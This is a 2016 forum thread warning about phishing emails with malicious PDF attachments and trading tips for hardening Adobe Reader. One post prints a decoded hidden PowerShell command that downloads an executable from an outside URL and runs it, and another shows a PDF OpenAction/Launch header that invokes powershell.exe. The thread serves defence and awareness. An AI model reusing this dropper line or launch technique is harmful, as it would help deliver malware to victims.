Malicious content in .pdf attachments

angussf

posted Apr 27 '16 at 3:15 am

[quote user="irelam"]In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript. I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.
[/quote]

You also need to disable opening of non-PDF attachments using external applications. That setting is on the "Trust Manager" page of Preferences. I also always disable "Allow multimedia operations" on the Preferences/Multimedia Trust (legacy) page -- I don't want a malware 0-day Flash attachment to start playing in Reader.

Unfortunately all these options are per-user, not per-computer, so you would need to do it for every login on your computer. Might be able to configure them using Group Policy in a domain setting, but I don't know how. I can only find the Javascript option in the registry, the MMTrust and TrustMgr don't have separate keys under Adobe Reader.

[quote user="irelam"]In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript.&nbsp; I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution. [/quote] You also need to disable opening of non-PDF attachments using external applications.&nbsp; That setting is on the "Trust Manager" page of Preferences.&nbsp; I also always disable "Allow multimedia operations" on the Preferences/Multimedia Trust (legacy) page -- I don't want a malware 0-day Flash attachment to start playing in Reader. Unfortunately all these options are per-user, not per-computer, so you would need to do it for every login on your computer.&nbsp; Might be able to configure them using Group Policy in a domain setting, but I don't know how.&nbsp; I can only find the Javascript option in the registry, the MMTrust and TrustMgr don't have separate keys under Adobe Reader.

Brian Fluet

posted Apr 20 '16 at 6:43 pm

All,

Just a heads up to let you know that I have recently received two messages here at the office that carried a .pdf attachment containing a base64 encoded script. The decoded content of one of them was:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe)

I had heard that .pdf files could carry malicious content but this is the first one I have actually seen (assumption: mike.exe is malicious).

These messages looked very genuine with subjects like "New order inquiry" and content like "Please find the attached PO copy and New order...".

This is social engineering at a very high level. Be careful out there!

All, Just a heads up to let you know that I have recently received two messages here at the office that carried a .pdf attachment containing a base64 encoded script.&nbsp; The decoded content of one of them was: PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://ncduganda.org/.css/mike.exe', $env:APPDATA\mike.exe);Start-Process ($env:APPDATA\mike.exe) I had heard that .pdf files could carry malicious content but this is the first one I have actually seen (assumption:&nbsp; mike.exe is malicious).&nbsp; These messages looked very genuine with subjects like "New order inquiry" and content like "Please find the attached PO copy and New order...".&nbsp; &nbsp; This is social engineering at a very high level.&nbsp; Be careful out there!

irelam

posted Apr 21 '16 at 1:15 am

Brian

What did you use to decode the base64 script. In particular was it done by Adobe code ? Did you know that a Pdf file could contain an attachment, and following on from that, is there a marker that declares this kind of content. For example we can detect an encrypted zip file in Virscan.

Martin

Brian&nbsp; What did you use to decode the base64 script. In particular was it done by Adobe code ?&nbsp; Did you know that a Pdf file could contain an attachment, and following on from that, is there a marker that declares this kind of content.&nbsp; For example we can detect an encrypted zip file in Virscan.Martin&nbsp;

Brian Fluet

posted Apr 21 '16 at 3:02 am

The red flag was content visible in the preview pane. Here are the lines up to the encoded part:

%PDF-1.1
1 0 obj
<<
/OpenAction <<
/S /Launch/Win
<<
/F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P
(powershell.exe -EncodedCommand

I use Tracker-Software products for my pdf viewing/editing so I posted on their support forum inquiry into built-in protection. Someone there decoded it.

See: www.tracker-software.com/forum3/viewtopic.php?f=62&t=25640.

The red flag was content visible in the preview pane.&nbsp; Here are the lines up to the encoded part:%PDF-1.1 1 0 obj &lt;&lt; /OpenAction &lt;&lt; /S /Launch/Win &lt;&lt; /F (C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe) /P (powershell.exe -EncodedCommandI use Tracker-Software products for my pdf viewing/editing so I posted on their support forum inquiry into built-in protection.&nbsp; Someone there decoded it.See: www.tracker-software.com/forum3/viewtopic.php?f=62&amp;t=25640.

irelam

posted Apr 24 '16 at 6:12 am

In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript. I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.

In Adobe Reader you can disable Javascript via the menu Preferences/Javascript and uncheck the Enable Acrobat Javascript.&nbsp; I am not sure if this would complelely protect you but it is worth a try. Seems there is also a way of involving Group Policy controlling Reader execution.

Related Topics

Pending draft

Confirm move posts

Insufficient permissions

Select a different topic

Edit history